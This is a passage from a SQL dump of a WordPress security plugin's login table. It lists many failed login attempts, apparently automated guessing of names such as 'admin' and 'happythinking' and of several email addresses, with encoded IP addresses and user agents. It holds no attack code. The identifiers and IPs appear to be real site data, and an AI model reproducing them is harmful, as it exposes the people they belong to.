(9335, 33093, 1694685645.138295, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÝž', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9336, 33094, 1694685650.032030, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg9\\í', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9337, 33095, 1694685652.937385, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœÑ+~', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9338, 33096, 1694685657.006575, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ·±', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9339, 33096, 1694685657.018027, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ·±', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9340, 33097, 1694685663.578268, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßÏia', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9341, 33098, 1694685667.838651, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿË™*¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9342, 33099, 1694685685.433276, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄËoÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9343, 33099, 1694685685.445685, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄËoÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9344, 33100, 1694685692.990039, 1, 'loginFailInvalidUsername', 'abceasyas123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq­VH', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9345, 33101, 1694685697.054508, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡„˜', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9346, 33102, 1694685714.765197, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgøÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9347, 33103, 1694685726.651466, 1, 'loginFailInvalidUsername', 'chloe181', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀŒàž', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9348, 33104, 1694685730.415376, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ:f\r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9349, 33105, 1694685734.167620, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_w', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9350, 33106, 1694685754.000968, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ”;|', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9351, 33107, 1694685766.903469, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuþk', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9352, 33107, 1694685766.917436, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuþk', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9353, 33108, 1694685772.665059, 1, 'loginFailInvalidUsername', 'study*20', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿVaÐs', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9354, 33109, 1694685777.845108, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsM˜m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9355, 33110, 1694685814.758067, 1, 'loginFailInvalidUsername', 'happythinking123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuì§„', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9356, 33111, 1694685819.022403, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹žß', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9357, 33112, 1694685839.813324, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO—ú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9358, 33113, 1694685843.407491, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}éu', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9359, 33114, 1694685847.507850, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿Äœ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9360, 33114, 1694685847.521707, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿Äœ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9361, 33115, 1694685853.162973, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿtH¥', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9362, 33116, 1694685856.692040, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶ºÛÖ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9363, 33117, 1694685860.095543, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%é', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9364, 33118, 1694685876.384313, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+üÔ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9365, 33119, 1694685895.162029, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgòÇÄ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9366, 33120, 1694685899.283430, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡®©', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9367, 33120, 1694685899.293356, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡®©', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9368, 33121, 1694685905.611393, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¨Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9369, 33122, 1694685909.037969, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgFÅa', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9370, 33123, 1694685926.735889, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹F5u', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9371, 33124, 1694685932.326230, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ñ/Ê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9372, 33125, 1694685951.293704, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuƒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9373, 33126, 1694685969.741829, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$ÿ>', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9374, 33127, 1694685988.825754, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgNš', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9375, 33128, 1694685991.966869, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÊòO', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9376, 33129, 1694685995.702736, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$Um¥', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9377, 33130, 1694686002.784489, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ:G', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(10504, 51310, 1712320067.688908, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅÝÿû', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10505, 51311, 1712320068.334018, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³°é', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10506, 51313, 1712320077.173147, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¡%Ò', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10507, 51314, 1712320079.067604, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡7­', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10508, 51315, 1712320085.938647, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz°Åþ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10509, 51317, 1712320097.456479, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿBbú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10510, 51318, 1712320098.984347, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊYC', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10511, 51319, 1712320101.954225, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ/&¼', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10512, 51320, 1712320104.541330, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;¶+G', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10513, 51321, 1712320111.234028, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿzªÀŒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10514, 51322, 1712320115.250220, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿj×XÖ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10515, 51323, 1712320117.491599, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔºQR', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko');
INSERT INTO `wpou_wflogins` VALUES
(10516, 51324, 1712320123.121827, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿV|Ž/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10517, 51326, 1712320127.650236, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Þ³ÿ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10518, 51327, 1712320140.060909, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ>ª', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10519, 51328, 1712320146.977378, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ëÛo', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10520, 51329, 1712320157.734389, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿXœŠ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10521, 51330, 1712320162.402594, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹s¶', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10522, 51331, 1712320163.028196, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¢–&', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10523, 51332, 1712320178.294394, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿªP˜W', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10524, 51333, 1712320181.560534, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgQíç', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10525, 51334, 1712320188.044092, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Jã¿', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10526, 51336, 1712320217.121465, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf°eH', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10527, 51338, 1712320218.731039, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž0w', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10528, 51339, 1712320219.633803, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+#ˆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10529, 51341, 1712320224.117834, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´¿¬„', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10530, 51342, 1712320232.180238, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿZñß1', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10531, 51343, 1712320232.806210, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿž>>@', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10532, 51345, 1712320255.634927, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¦eé', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10533, 51347, 1712320256.122616, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxWX', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10534, 51348, 1712320257.023021, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{óR', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10535, 51350, 1712320259.541538, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔí¹_', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10536, 51351, 1712320259.905926, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿj', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10537, 51352, 1712320265.777695, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_&”(', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10538, 51354, 1712320279.505000, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgjŠ­', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10539, 51357, 1712320283.650116, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$Ñs', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10540, 51358, 1712320285.159839, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈQ{ ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10541, 51359, 1712320292.518070, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Sæ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10542, 51360, 1712320294.084787, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg±ÑC', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10543, 51362, 1712320295.965263, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1#±', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10544, 51363, 1712320303.531719, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&·DÒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10545, 51364, 1712320303.645783, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³Ó$C', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10546, 51365, 1712320306.366714, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-û!¹', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10547, 51366, 1712320309.734444, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO@', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10548, 51369, 1712320320.389879, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;`ÖH', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10549, 51371, 1712320326.361746, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf‰\r', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10550, 51372, 1712320335.392338, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}>Zê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10551, 51374, 1712320344.359249, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¥"³', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10552, 51375, 1712320347.055962, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšÀ/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10553, 51376, 1712320358.684472, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ¿ðQ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10554, 51377, 1712320368.399253, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹“do', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10555, 51378, 1712320372.578756, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ùn', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10556, 51380, 1712320384.425245, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿBµ¼x', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10557, 51381, 1712320385.580366, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÿ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10558, 51383, 1712320388.529892, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿo}iÅ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10559, 51384, 1712320391.579506, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿSn¸p', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10560, 51386, 1712320407.428547, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔJú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10561, 51387, 1712320411.028948, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¾ßM', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10562, 51390, 1712320424.547566, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ¸³¸', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10563, 51391, 1712320428.407738, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±%·i', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10564, 51392, 1712320432.024742, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿV|‰)', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10565, 51393, 1712320447.834662, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg&\rc', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10566, 51394, 1712320451.027744, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿp‡Ïì', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10567, 51395, 1712320453.111557, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&¬š', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
